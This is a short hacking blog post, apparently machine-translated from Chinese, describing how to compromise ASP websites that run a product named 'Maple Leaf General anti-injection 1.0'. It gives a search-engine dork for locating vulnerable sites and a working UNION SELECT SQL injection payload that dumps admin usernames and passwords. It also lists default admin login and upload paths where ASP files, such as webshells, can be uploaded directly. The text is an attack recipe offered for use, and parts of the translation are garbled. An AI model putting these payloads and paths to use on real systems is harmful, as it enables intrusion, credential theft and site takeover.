Keywords: inurl:pro_show.asp?showid=
The program using the Maple Leaf General anti-injection 1.0asp version, this injection completely chicken, the type of Web site program pro_show.asp
There is a cookie injection or variant injection, before the injection can determine the number of fields: ORDER by XX
Injection statement: and 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 From Lei_admin
The number of fields depends on the judgment of the individual
Password is both clear and clear, default background address: Admin/index/login.asp (also modified)
Background upload address: admin/inc/upfile.htm can upload ASP files directly
Upload Path admin/upimg/
Some backgrounds have two file upload vulnerabilities: admin/inc/upfiletwo.asp
Some backstage and the EWeb editor.
This article is from the "No Mark" blog, please be sure to keep this source http://hucwuhen.blog.51cto.com/6253667/1269470